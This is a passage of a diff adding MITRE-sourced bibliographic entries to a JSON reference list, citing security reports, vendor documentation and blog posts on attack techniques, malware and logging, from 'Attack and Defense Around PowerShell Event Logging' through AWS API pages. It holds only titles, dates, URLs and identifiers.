}, + "related": [], + "uuid": "a6311a66-bb36-4cad-a98f-2b0b89aafa3d", + "value": "The DFIR Report Truebot June 12 2023" + }, + { + "description": "Hao, M. (2019, February 27). Attack and Defense Around PowerShell Event Logging. Retrieved November 24, 2021.", + "meta": { + "date_accessed": "2021-11-24T00:00:00Z", + "date_published": "2019-02-27T00:00:00Z", + "refs": [ + "https://nsfocusglobal.com/attack-and-defense-around-powershell-event-logging/" + ], + "source": "MITRE", + "title": "Attack and Defense Around PowerShell Event Logging" + }, + "related": [], + "uuid": "52212570-b1a6-4249-99d4-3bcf66c27140", + "value": "att_def_ps_logging" + }, + { + "description": "Fishbein, N. (2020, September 8). Attackers Abusing Legitimate Cloud Monitoring Tools to Conduct Cyber Attacks. Retrieved September 22, 2021.", + "meta": { + "date_accessed": "2021-09-22T00:00:00Z", + "date_published": "2020-09-08T00:00:00Z", + "refs": [ + "https://www.intezer.com/blog/cloud-security/attackers-abusing-legitimate-cloud-monitoring-tools-to-conduct-cyber-attacks/" + ], + "source": "MITRE", + "title": "Attackers Abusing Legitimate Cloud Monitoring Tools to Conduct Cyber Attacks" + }, + "related": [], + "uuid": "1155a45e-86f4-497a-9a03-43b6dcb25202", + "value": "Intezer TeamTNT September 2020" + }, + { + "description": "Metcalf, S. (2015, January 19). Attackers Can Now Use Mimikatz to Implant Skeleton Key on Domain Controllers & BackDoor Your Active Directory Forest. Retrieved February 3, 2015.", + "meta": { + "date_accessed": "2015-02-03T00:00:00Z", + "date_published": "2015-01-19T00:00:00Z", + "refs": [ + "http://adsecurity.org/?p=1275" + ], + "source": "MITRE", + "title": "Attackers Can Now Use Mimikatz to Implant Skeleton Key on Domain Controllers & BackDoor Your Active Directory Forest" + }, + "related": [], + "uuid": "1c899028-466c-49b0-8d64-1a954c812508", + "value": "Metcalf 2015" + }, + { + "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.", + "meta": { + "date_accessed": "2020-10-20T00:00:00Z", + "date_published": "2020-10-19T00:00:00Z", + "refs": [ + "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954" + ], + "source": "MITRE", + "title": "Attackers Continue to Target Legacy Devices" + }, + "related": [], + "uuid": "f7ce5099-7e04-4c0b-8767-e0eec664b18e", + "value": "Cisco Blog Legacy Device Attacks" + }, + { + "description": "Johnson, B, et. al. (2017, December 14). Attackers Deploy New ICS Attack Framework \"TRITON\" and Cause Operational Disruption to Critical Infrastructure. Retrieved January 6, 2021.", + "meta": { + "date_accessed": "2021-01-06T00:00:00Z", + "date_published": "2017-12-14T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html" + ], + "source": "MITRE", + "title": "Attackers Deploy New ICS Attack Framework \"TRITON\" and Cause Operational Disruption to Critical Infrastructure" + }, + "related": [], + "uuid": "597a4d8b-ffb2-4551-86db-b319f5a5b707", + "value": "FireEye TRITON 2017" + }, + { + "description": "Runa A. Sandvik. (2014, January 14). Attackers Scrape GitHub For Cloud Service Credentials, Hijack Account To Mine Virtual Currency. Retrieved August 9, 2022.", + "meta": { + "date_accessed": "2022-08-09T00:00:00Z", + "date_published": "2014-01-14T00:00:00Z", + "refs": [ + "https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/" + ], + "source": "MITRE", + "title": "Attackers Scrape GitHub For Cloud Service Credentials, Hijack Account To Mine Virtual Currency" + }, + "related": [], + "uuid": "d2186b8c-10c9-493b-8e25-7d69fce006e4", + "value": "GitHub Cloud Service Credentials" + }, + { + "description": "Sandvik, R. (2014, January 14). Attackers Scrape GitHub For Cloud Service Credentials, Hijack Account To Mine Virtual Currency. Retrieved October 19, 2020.", + "meta": { + "date_accessed": "2020-10-19T00:00:00Z", + "date_published": "2014-01-14T00:00:00Z", + "refs": [ + "https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/#242c479d3196" + ], + "source": "MITRE", + "title": "Attackers Scrape GitHub For Cloud Service Credentials, Hijack Account To Mine Virtual Currency" + }, + "related": [], + "uuid": "303f8801-bdd6-4a0c-a90a-37867898c99c", + "value": "Forbes GitHub Creds" + }, + { + "description": "Chen, J.. (2020, January 29). Attacker's Tactics and Techniques in Unsecured Docker Daemons Revealed. Retrieved March 31, 2021.", + "meta": { + "date_accessed": "2021-03-31T00:00:00Z", + "date_published": "2020-01-29T00:00:00Z", + "refs": [ + "https://unit42.paloaltonetworks.com/attackers-tactics-and-techniques-in-unsecured-docker-daemons-revealed/" + ], + "source": "MITRE", + "title": "Attacker's Tactics and Techniques in Unsecured Docker Daemons Revealed" + }, + "related": [], + "uuid": "efcbbbdd-9af1-46c2-8538-3fd22f2b67d2", + "value": "Unit 42 Unsecured Docker Daemons" + }, + { + "description": "Bullock, B.. (2016, October 3). Attacking Exchange with MailSniper. Retrieved October 6, 2019.", + "meta": { + "date_accessed": "2019-10-06T00:00:00Z", + "date_published": "2016-10-03T00:00:00Z", + "refs": [ + "https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/" + ], + "source": "MITRE", + "title": "Attacking Exchange with MailSniper" + }, + "related": [], + "uuid": "adedfddc-29b7-4245-aa67-cc590acb7434", + "value": "Black Hills Attacking Exchange MailSniper, 2016" + }, + { + "description": "Medin, T. (2014, November). Attacking Kerberos - Kicking the Guard Dog of Hades. Retrieved March 22, 2018.", + "meta": { + "date_accessed": "2018-03-22T00:00:00Z", + "date_published": "2014-11-01T00:00:00Z", + "refs": [ + "https://redsiege.com/kerberoast-slides" + ], + "source": "MITRE", + "title": "Attacking Kerberos - Kicking the Guard Dog of Hades" + }, + "related": [], + "uuid": "f20d6bd0-d699-4ee4-8ef6-3c45ec12cd42", + "value": "SANS Attacking Kerberos Nov 2014" + }, + { + "description": "Sutherland, S. (2017, July 13). Attacking SQL Server CLR Assemblies. Retrieved July 8, 2019.", + "meta": { + "date_accessed": "2019-07-08T00:00:00Z", + "date_published": "2017-07-13T00:00:00Z", + "refs": [ + "https://blog.netspi.com/attacking-sql-server-clr-assemblies/" + ], + "source": "MITRE", + "title": "Attacking SQL Server CLR Assemblies" + }, + "related": [], + "uuid": "6f3d8c89-9d5d-4754-98d5-44fe3a5dd0d5", + "value": "NetSPI SQL Server CLR" + }, + { + "description": "Bromiley, M. and Lewis, P. (2016, October 7). Attacking the Hospitality and Gaming Industries: Tracking an Attacker Around the World in 7 Years. Retrieved October 6, 2017.", + "meta": { + "date_accessed": "2017-10-06T00:00:00Z", + "date_published": "2016-10-07T00:00:00Z", + "refs": [ + "https://www.youtube.com/watch?v=fevGZs0EQu8" + ], + "source": "MITRE", + "title": "Attacking the Hospitality and Gaming Industries: Tracking an Attacker Around the World in 7 Years" + }, + "related": [], + "uuid": "2bd39baf-4223-4344-ba93-98aa8453dc11", + "value": "Mandiant FIN5 GrrCON Oct 2016" + }, + { + "description": "Administrator, Penetration Testing Lab. (2012, October 30). Attacking VNC Servers. Retrieved October 6, 2021.", + "meta": { + "date_accessed": "2021-10-06T00:00:00Z", + "date_published": "2012-10-30T00:00:00Z", + "refs": [ + "https://pentestlab.blog/2012/10/30/attacking-vnc-servers/" + ], + "source": "MITRE", + "title": "Attacking VNC Servers" + }, + "related": [], + "uuid": "f953ea41-f9ca-4f4e-a46f-ef1d2def1d07", + "value": "Attacking VNC Servers PentestLab" + }, + { + "description": "Baird, S. et al.. (2017, July 7). Attack on Critical Infrastructure Leverages Template Injection. Retrieved July 21, 2018.", + "meta": { + "date_accessed": "2018-07-21T00:00:00Z", + "date_published": "2017-07-07T00:00:00Z", + "refs": [ + "https://blog.talosintelligence.com/2017/07/template-injection.html" + ], + "source": "MITRE", + "title": "Attack on Critical Infrastructure Leverages Template Injection" + }, + "related": [], + "uuid": "175ea537-2a94-42c7-a83b-bec8906ee6b9", + "value": "Talos Template Injection July 2017" + }, + { + "description": "Falcone, R. and Miller-Osborn, J.. (2015, December 18). Attack on French Diplomat Linked to Operation Lotus Blossom. Retrieved February 15, 2016.", + "meta": { + "date_accessed": "2016-02-15T00:00:00Z", + "date_published": "2015-12-18T00:00:00Z", + "refs": [ + "http://researchcenter.paloaltonetworks.com/2015/12/attack-on-french-diplomat-linked-to-operation-lotus-blossom/" + ], + "source": "MITRE", + "title": "Attack on French Diplomat Linked to Operation Lotus Blossom" + }, + "related": [], + "uuid": "dcbe51a0-6d63-4401-b19e-46cd3c42204c", + "value": "Lotus Blossom Dec 2015" + }, + { + "description": "Symantec. (2021, June 10). Attacks Against the Government Sector. Retrieved September 28, 2021.", + "meta": { + "date_accessed": "2021-09-28T00:00:00Z", + "date_published": "2021-06-10T00:00:00Z", + "refs": [ + "https://symantec.broadcom.com/hubfs/Attacks-Against-Government-Sector.pdf" + ], + "source": "MITRE", + "title": "Attacks Against the Government Sector" + }, + "related": [], + "uuid": "f5940cc2-1bbd-4e42-813a-f50867b01035", + "value": "Symantec Attacks Against Government Sector" + }, + { + "description": "Team Nautilus. (2021, June). Attacks in the Wild on the Container Supply Chain and Infrastructure. Retrieved August 26, 2021.", + "meta": { + "date_accessed": "2021-08-26T00:00:00Z", + "date_published": "2021-06-01T00:00:00Z", + "refs": [ + "https://info.aquasec.com/hubfs/Threat%20reports/AquaSecurity_Cloud_Native_Threat_Report_2021.pdf?utm_campaign=WP%20-%20Jun2021%20Nautilus%202021%20Threat%20Research%20Report&utm_medium=email&_hsmi=132931006&_hsenc=p2ANqtz-_8oopT5Uhqab8B7kE0l3iFo1koirxtyfTehxF7N-EdGYrwk30gfiwp5SiNlW3G0TNKZxUcDkYOtwQ9S6nNVNyEO-Dgrw&utm_content=132931006&utm_source=hs_automation" + ], + "source": "MITRE", + "title": "Attacks in the Wild on the Container Supply Chain and Infrastructure" + }, + "related": [], + "uuid": "be9652d5-7531-4143-9c44-aefd019b7a32", + "value": "Aqua Security Cloud Native Threat Report June 2021" + }, + { + "description": "CERT-FR. (2020, April 1). ATTACKS INVOLVING THE MESPINOZA/PYSA RANSOMWARE. Retrieved March 1, 2021.", + "meta": { + "date_accessed": "2021-03-01T00:00:00Z", + "date_published": "2020-04-01T00:00:00Z", + "refs": [ + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-003.pdf" + ], + "source": "MITRE", + "title": "ATTACKS INVOLVING THE MESPINOZA/PYSA RANSOMWARE" + }, + "related": [], + "uuid": "4e502db6-2e09-4422-9dcc-1e10e701e122", + "value": "CERT-FR PYSA April 2020" + }, + { + "description": "Sander, J. (2017, October 12). Attack Step 3: Persistence with NTFS Extended Attributes – File System Attacks. Retrieved March 21, 2018.", + "meta": { + "date_accessed": "2018-03-21T00:00:00Z", + "date_published": "2017-10-12T00:00:00Z", + "refs": [ + "https://blog.stealthbits.com/attack-step-3-persistence-ntfs-extended-attributes-file-system-attacks" + ], + "source": "MITRE", + "title": "Attack Step 3: Persistence with NTFS Extended Attributes – File System Attacks" + }, + "related": [], + "uuid": "6d270128-0461-43ec-8925-204c7b5aacc9", + "value": "InsiderThreat NTFS EA Oct 2017" + }, + { + "description": "Microsoft. (2023, February 22). Attack surface reduction (ASR) rules reference: Block execution of potentially obfuscated scripts. Retrieved March 17, 2023.", + "meta": { + "date_accessed": "2023-03-17T00:00:00Z", + "date_published": "2023-02-22T00:00:00Z", + "refs": [ + "https://learn.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference#block-execution-of-potentially-obfuscated-scripts" + ], + "source": "MITRE", + "title": "Attack surface reduction (ASR) rules reference: Block execution of potentially obfuscated scripts" + }, + "related": [], + "uuid": "dec646d4-8b32-5091-b097-abe887aeca96", + "value": "Microsoft ASR Obfuscation" + }, + { + "description": "Co, M. and Sison, G. (2018, February 8). Attack Using Windows Installer msiexec.exe leads to LokiBot. Retrieved April 18, 2019.", + "meta": { + "date_accessed": "2019-04-18T00:00:00Z", + "date_published": "2018-02-08T00:00:00Z", + "refs": [ + "https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/" + ], + "source": "MITRE", + "title": "Attack Using Windows Installer msiexec.exe leads to LokiBot" + }, + "related": [], + "uuid": "768c99f3-ee28-47dc-bc33-06d50ac72dea", + "value": "TrendMicro Msiexec Feb 2018" + }, + { + "description": "Stepanic, D. (2018, September 2). attck_empire: Generate ATT&CK Navigator layer file from PowerShell Empire agent logs. Retrieved March 11, 2019.", + "meta": { + "date_accessed": "2019-03-11T00:00:00Z", + "date_published": "2018-09-02T00:00:00Z", + "refs": [ + "https://github.com/dstepanic/attck_empire" + ], + "source": "MITRE", + "title": "attck_empire: Generate ATT&CK Navigator layer file from PowerShell Empire agent logs" + }, + "related": [], + "uuid": "b3d6bb33-2b23-4c0a-b8fa-e002a5c7edfc", + "value": "GitHub ATTACK Empire" + }, + { + "description": "Tony Lambert. (2022, November 13). ATT&CK T1501: Understanding systemd service persistence. Retrieved March 20, 2023.", + "meta": { + "date_accessed": "2023-03-20T00:00:00Z", + "date_published": "2022-11-13T00:00:00Z", + "refs": [ + "https://redcanary.com/blog/attck-t1501-understanding-systemd-service-persistence/" + ], + "source": "MITRE", + "title": "ATT&CK T1501: Understanding systemd service persistence" + }, + "related": [], + "uuid": "196f0c77-4c98-57e7-ad79-eb43bdd2c848", + "value": "lambert systemd 2022" + }, + { + "description": "Microsoft. (2016, April 15). Attractive Accounts for Credential Theft. Retrieved June 3, 2016.", + "meta": { + "date_accessed": "2016-06-03T00:00:00Z", + "date_published": "2016-04-15T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/en-us/library/dn535501.aspx" + ], + "source": "MITRE", + "title": "Attractive Accounts for Credential Theft" + }, + "related": [], + "uuid": "5c183c97-0ab2-4b75-8dbc-9db92a929ff4", + "value": "TechNet Credential Theft" + }, + { + "description": "Gagliardi, R. (n.d.). Audit in a OS X System. Retrieved September 23, 2021.", + "meta": { + "date_accessed": "2021-09-23T00:00:00Z", + "refs": [ + "https://www.scip.ch/en/?labs.20150108" + ], + "source": "MITRE", + "title": "Audit in a OS X System" + }, + "related": [], + "uuid": "c5181c95-0a94-4ea0-9940-04a9663d0069", + "value": "Audit OSX" + }, + { + "description": "Microsoft. (2021, September 6). Audit logon events. Retrieved September 28, 2021.", + "meta": { + "date_accessed": "2021-09-28T00:00:00Z", + "date_published": "2021-09-06T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ], + "source": "MITRE", + "title": "Audit logon events" + }, + "related": [], + "uuid": "050d6da7-a78c-489d-8bef-b06d802b55d7", + "value": "Microsoft Audit Logon Events" + }, + { + "description": "Google. (n.d.). Audit Logs. Retrieved June 1, 2020.", + "meta": { + "date_accessed": "2020-06-01T00:00:00Z", + "refs": [ + "https://cloud.google.com/logging/docs/audit#admin-activity" + ], + "source": "MITRE", + "title": "Audit Logs" + }, + "related": [], + "uuid": "500bdcea-5f49-4949-80fb-5eec1ce5e09e", + "value": "Cloud Audit Logs" + }, + { + "description": "Microsoft. (2017, May 28). Audit Other Object Access Events. Retrieved June 27, 2019.", + "meta": { + "date_accessed": "2019-06-27T00:00:00Z", + "date_published": "2017-05-28T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-object-access-events" + ], + "source": "MITRE", + "title": "Audit Other Object Access Events" + }, + "related": [], + "uuid": "79e54b41-69ba-4738-86ef-88c4f540bce3", + "value": "Microsoft Scheduled Task Events Win10" + }, + { + "description": "Jason Gerend, et al. (2017, October 16). auditpol. Retrieved September 1, 2021.", + "meta": { + "date_accessed": "2021-09-01T00:00:00Z", + "date_published": "2017-10-16T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/auditpol" + ], + "source": "MITRE", + "title": "auditpol" + }, + "related": [], + "uuid": "20d18ecf-d7d3-4433-9a3c-c28be71de4b1", + "value": "auditpol" + }, + { + "description": "STRONTIC. (n.d.). auditpol.exe. Retrieved September 9, 2021.", + "meta": { + "date_accessed": "2021-09-09T00:00:00Z", + "refs": [ + "https://strontic.github.io/xcyclopedia/library/auditpol.exe-214E0EA1F7F7C27C82D23F183F9D23F1.html" + ], + "source": "MITRE", + "title": "auditpol.exe" + }, + "related": [], + "uuid": "c8a305b3-cd17-4415-a740-32787da703cd", + "value": "auditpol.exe_STRONTIC" + }, + { + "description": "Daniel Simpson. (2017, April 19). Audit Policy. Retrieved September 13, 2021.", + "meta": { + "date_accessed": "2021-09-13T00:00:00Z", + "date_published": "2017-04-19T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/audit-policy" + ], + "source": "MITRE", + "title": "Audit Policy" + }, + "related": [], + "uuid": "9ff43f64-7fcb-4aa3-9599-9d00774d8da5", + "value": "Audit_Policy_Microsoft" + }, + { + "description": "Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved June 3, 2016.", + "meta": { + "date_accessed": "2016-06-03T00:00:00Z", + "date_published": "2016-04-15T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/en-us/library/dn487457.aspx" + ], + "source": "MITRE", + "title": "Audit Policy Recommendations" + }, + "related": [], + "uuid": "406cd8ff-e539-4853-85ed-775726155cf1", + "value": "TechNet Audit Policy" + }, + { + "description": "Microsoft. (2012, July 2). Audit Registry. Retrieved January 31, 2018.", + "meta": { + "date_accessed": "2018-01-31T00:00:00Z", + "date_published": "2012-07-02T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/dd941614(v=ws.10)" + ], + "source": "MITRE", + "title": "Audit Registry" + }, + "related": [], + "uuid": "4e95ad81-cbc4-4f66-ba95-fb781d7d9c3c", + "value": "Microsoft Audit Registry July 2012" + }, + { + "description": "Paganini, P. (2012, September 9). Elderwood project, who is behind Op. Aurora and ongoing attacks?. Retrieved February 13, 2018.", + "meta": { + "date_accessed": "2018-02-13T00:00:00Z", + "refs": [ + "http://securityaffairs.co/wordpress/8528/hacking/elderwood-project-who-is-behind-op-aurora-and-ongoing-attacks.html" + ], + "source": "MITRE", + "title": "Aurora and ongoing attacks?" + }, + "related": [], + "uuid": "ebfc56c5-0490-4b91-b49f-548c00a59162", + "value": "Security Affairs Elderwood Sept 2012" + }, + { + "description": "NIST. (n.d.). Authentication. Retrieved January 30, 2020.", + "meta": { + "date_accessed": "2020-01-30T00:00:00Z", + "refs": [ + "https://csrc.nist.gov/glossary/term/authentication" + ], + "source": "MITRE", + "title": "Authentication" + }, + "related": [], + "uuid": "f3cfb9b9-62f4-4066-a2b9-7e6f25bd7a46", + "value": "NIST Authentication" + }, + { + "description": "Microsoft. (n.d.). Authentication Packages. Retrieved March 1, 2017.", + "meta": { + "date_accessed": "2017-03-01T00:00:00Z", + "refs": [ + "https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx" + ], + "source": "MITRE", + "title": "Authentication Packages" + }, + "related": [], + "uuid": "e9bb8434-9b6d-4301-bfe2-5c83ceabb020", + "value": "MSDN Authentication Packages" + }, + { + "description": "Microsoft. (n.d.). Authenticode. Retrieved January 31, 2018.", + "meta": { + "date_accessed": "2018-01-31T00:00:00Z", + "refs": [ + "https://msdn.microsoft.com/library/ms537359.aspx" + ], + "source": "MITRE", + "title": "Authenticode" + }, + "related": [], + "uuid": "33efd1a3-ffe9-42b3-ae12-970ed11454bf", + "value": "Microsoft Authenticode" + }, + { + "description": "Kubernetes. (n.d.). Authorization Overview. Retrieved June 24, 2021.", + "meta": { + "date_accessed": "2021-06-24T00:00:00Z", + "refs": [ + "https://kubernetes.io/docs/reference/access-authn-authz/authorization/" + ], + "source": "MITRE", + "title": "Authorization Overview" + }, + "related": [], + "uuid": "120f968a-c81f-4902-9b76-7544577b768d", + "value": "K8s Authorization Overview" + }, + { + "description": "ssh.com. (n.d.). Authorized_keys File in SSH. Retrieved June 24, 2020.", + "meta": { + "date_accessed": "2020-06-24T00:00:00Z", + "refs": [ + "https://www.ssh.com/ssh/authorized_keys/" + ], + "source": "MITRE", + "title": "Authorized_keys File in SSH" + }, + "related": [], + "uuid": "ff100b76-894e-4d7c-9b8d-5f0eedcf59cc", + "value": "SSH Authorized Keys" + }, + { + "description": "Pascual, C. (2018, November 27). AutoIt-Compiled Worm Affecting Removable Media Delivers Fileless Version of BLADABINDI/njRAT Backdoor. Retrieved June 4, 2019.", + "meta": { + "date_accessed": "2019-06-04T00:00:00Z", + "date_published": "2018-11-27T00:00:00Z", + "refs": [ + "https://blog.trendmicro.com/trendlabs-security-intelligence/autoit-compiled-worm-affecting-removable-media-delivers-fileless-version-of-bladabindi-njrat-backdoor/" + ], + "source": "MITRE", + "title": "AutoIt-Compiled Worm Affecting Removable Media Delivers Fileless Version of BLADABINDI/njRAT Backdoor" + }, + "related": [], + "uuid": "d8e7b428-84dd-4d96-b3f3-70e7ed7f8271", + "value": "Trend Micro njRAT 2018" + }, + { + "description": "Apple. (2016, December 6). Automatically re-open windows, apps, and documents on your Mac. Retrieved July 11, 2017.", + "meta": { + "date_accessed": "2017-07-11T00:00:00Z", + "date_published": "2016-12-06T00:00:00Z", + "refs": [ + "https://support.apple.com/en-us/HT204005" + ], + "source": "MITRE", + "title": "Automatically re-open windows, apps, and documents on your Mac" + }, + "related": [], + "uuid": "ed907f1e-71d6-45db-8ef3-75bec59c238b", + "value": "Re-Open windows on Mac" + }, + { + "description": "Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.", + "meta": { + "date_accessed": "2016-06-06T00:00:00Z", + "date_published": "2016-01-04T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/en-us/sysinternals/bb963902" + ], + "source": "MITRE", + "title": "Autoruns for Windows v13.51" + }, + "related": [], + "uuid": "709f4509-9d69-4033-8aa6-a947496a1703", + "value": "TechNet Autoruns" + }, + { + "description": "Mark Russinovich. (2019, June 28). Autoruns for Windows v13.96. Retrieved March 13, 2020.", + "meta": { + "date_accessed": "2020-03-13T00:00:00Z", + "date_published": "2019-06-28T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns" + ], + "source": "MITRE", + "title": "Autoruns for Windows v13.96" + }, + "related": [], + "uuid": "aaf66ad0-c444-48b5-875f-a0f66b82031c", + "value": "Autoruns for Windows" + }, + { + "description": "Security Lab. (2020, June 5). Avaddon: From seeking affiliates to in-the-wild in 2 days. Retrieved August 19, 2021.", + "meta": { + "date_accessed": "2021-08-19T00:00:00Z", + "date_published": "2020-06-05T00:00:00Z", + "refs": [ + "https://www.hornetsecurity.com/en/security-information/avaddon-from-seeking-affiliates-to-in-the-wild-in-2-days/" + ], + "source": "MITRE", + "title": "Avaddon: From seeking affiliates to in-the-wild in 2 days" + }, + "related": [], + "uuid": "41377d56-2e7b-48a8-8561-681e04a65907", + "value": "Hornet Security Avaddon June 2020" + }, + { + "description": "Yuste, J. Pastrana, S. (2021, February 9). Avaddon ransomware: an in-depth analysis and decryption of infected systems. Retrieved August 19, 2021.", + "meta": { + "date_accessed": "2021-08-19T00:00:00Z", + "date_published": "2021-02-09T00:00:00Z", + "refs": [ + "https://arxiv.org/pdf/2102.04796.pdf" + ], + "source": "MITRE", + "title": "Avaddon ransomware: an in-depth analysis and decryption of infected systems" + }, + "related": [], + "uuid": "dbee8e7e-f477-4bd5-8225-84e0e222617e", + "value": "Arxiv Avaddon Feb 2021" + }, + { + "description": "CISA. (2021, February 1). Avoiding Social Engineering and Phishing Attacks. Retrieved September 8, 2023.", + "meta": { + "date_accessed": "2023-09-08T00:00:00Z", + "date_published": "2021-02-01T00:00:00Z", + "refs": [ + "https://www.cisa.gov/news-events/news/avoiding-social-engineering-and-phishing-attacks" + ], + "source": "MITRE", + "title": "Avoiding Social Engineering and Phishing Attacks" + }, + "related": [], + "uuid": "0c98bf66-f43c-5b09-ae43-d10c682f51e7", + "value": "CISA Phishing" + }, + { + "description": "Hasherezade. (2021, July 23). AvosLocker enters the ransomware scene, asks for partners. Retrieved January 11, 2023.", + "meta": { + "date_accessed": "2023-01-11T00:00:00Z", + "date_published": "2021-07-23T00:00:00Z", + "refs": [ + "https://www.malwarebytes.com/blog/threat-intelligence/2021/07/avoslocker-enters-the-ransomware-scene-asks-for-partners" + ], + "source": "MITRE", + "title": "AvosLocker enters the ransomware scene, asks for partners" + }, + "related": [], + "uuid": "88dffb14-a7a7-5b36-b269-8283dec0f1a3", + "value": "Malwarebytes AvosLocker Jul 2021" + }, + { + "description": "Lakshmanan, R. (2022, May 2). AvosLocker Ransomware Variant Using New Trick to Disable Antivirus Protection. Retrieved May 17, 2022.", + "meta": { + "date_accessed": "2022-05-17T00:00:00Z", + "date_published": "2022-05-02T00:00:00Z", + "refs": [ + "https://thehackernews.com/2022/05/avoslocker-ransomware-variant-using-new.html" + ], + "source": "MITRE", + "title": "AvosLocker Ransomware Variant Using New Trick to Disable Antivirus Protection" + }, + "related": [], + "uuid": "ea2756ce-a183-4c80-af11-92374ad045b2", + "value": "avoslocker_ransomware" + }, + { + "description": "Venere, G. Neal, C. (2022, June 21). Avos ransomware group expands with new attack arsenal. Retrieved January 11, 2023.", + "meta": { + "date_accessed": "2023-01-11T00:00:00Z", + "date_published": "2022-06-21T00:00:00Z", + "refs": [ + "https://blog.talosintelligence.com/avoslocker-new-arsenal/" + ], + "source": "MITRE", + "title": "Avos ransomware group expands with new attack arsenal" + }, + "related": [], + "uuid": "1170fdc2-6d8e-5b60-bf9e-ca915790e534", + "value": "Cisco Talos Avos Jun 2022" + }, + { + "description": "Alexandre D'Hondt. (n.d.). Awesome Executable Packing. Retrieved March 11, 2022.", + "meta": { + "date_accessed": "2022-03-11T00:00:00Z", + "refs": [ + "https://github.com/dhondta/awesome-executable-packing" + ], + "source": "MITRE", + "title": "Awesome Executable Packing" + }, + "related": [], + "uuid": "565bf600-5657-479b-9678-803e991c88a5", + "value": "Awesome Executable Packing" + }, + { + "description": "M.Leveille, M., Sanmillan, I. (2021, January). A WILD KOBALOS APPEARS Tricksy Linux malware goes after HPCs. Retrieved August 24, 2021.", + "meta": { + "date_accessed": "2021-08-24T00:00:00Z", + "date_published": "2021-01-01T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/wp-content/uploads/2021/01/ESET_Kobalos.pdf" + ], + "source": "MITRE", + "title": "A WILD KOBALOS APPEARS Tricksy Linux malware goes after HPCs" + }, + "related": [], + "uuid": "745e963e-33fd-40d4-a8c6-1a9f321017f4", + "value": "ESET Kobalos Jan 2021" + }, + { + "description": "Amazon. (n.d.). AWS Account Root User. Retrieved April 5, 2021.", + "meta": { + "date_accessed": "2021-04-05T00:00:00Z", + "refs": [ + "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html" + ], + "source": "MITRE", + "title": "AWS Account Root User" + }, + "related": [], + "uuid": "5f315c21-f02f-4c9e-aac6-d648deff3ff9", + "value": "AWS Root User" + }, + { + "description": "Damian Hickey. (2017, January 28). AWS-ADFS-Credential-Generator. Retrieved December 16, 2020.", + "meta": { + "date_accessed": "2020-12-16T00:00:00Z", + "date_published": "2017-01-28T00:00:00Z", + "refs": [ + "https://github.com/damianh/aws-adfs-credential-generator" + ], + "source": "MITRE", + "title": "AWS-ADFS-Credential-Generator" + }, + "related": [], + "uuid": "340a3a20-0ee1-4fd8-87ab-10ac0d2a50c8", + "value": "GitHub AWS-ADFS-Credential-Generator" + }, + { + "description": "Amazon Web Services. (n.d.). AWS API GetAccountPasswordPolicy. Retrieved June 8, 2021.", + "meta": { + "date_accessed": "2021-06-08T00:00:00Z", + "refs": [ + "https://docs.aws.amazon.com/IAM/latest/APIReference/API_GetAccountPasswordPolicy.html" + ], + "source": "MITRE", + "title": "AWS API GetAccountPasswordPolicy" + }, + "related": [], + "uuid": "dd44d565-b9d9-437e-a31a-a52c6a21e3b3", + "value": "AWS GetPasswordPolicy" + }, + { + "description": "Amazon. (n.d.). AWS Console Sign-in Events. Retrieved October 23, 2019.", + "meta": { + "date_accessed": "2019-10-23T00:00:00Z", + "refs": [ + "https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-event-reference-aws-console-sign-in-events.html" + ], + "source": "MITRE", + "title": "AWS Console Sign-in Events" + }, + "related": [], + "uuid": "72578d0b-f68a-40fa-9a5d-379a66792be8", + "value": "AWS Console Sign-in Events" + }, + { + "description": "Amazon Web Services. (n.d.). Retrieved May 28, 2021.", + "meta": { + "date_accessed": "2021-05-28T00:00:00Z", + "refs": [ + "https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html" + ], + "source": "MITRE", + "title": "AWS Describe DB Instances" + }, + "related": [], + "uuid": "85bda17d-7b7c-4d0e-a0d2-2adb5f0a6b82", + "value": "AWS Describe DB Instances" + }, + { + "description": "Amazon Web Services. (n.d.). Retrieved May 28, 2021.", + "meta": { + "date_accessed": "2021-05-28T00:00:00Z", + "refs": [ + "https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetBucketAcl.html" + ], + "source": "MITRE", + "title": "AWS Get Bucket ACL" + }, + "related": [], + "uuid": "1eddbd32-8314-4f95-812a-550904eac2fa", + "value": "AWS Get Bucket ACL" + }, + { + "description": "Amazon Web Services. (n.d.). Retrieved May 28, 2021.", + "meta": { + "date_accessed": "2021-05-28T00:00:00Z", + "refs": [ + "https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html" + ], + "source": "MITRE", + "title": "AWS Get Public Access Block" + }, + "related": [], + "uuid": 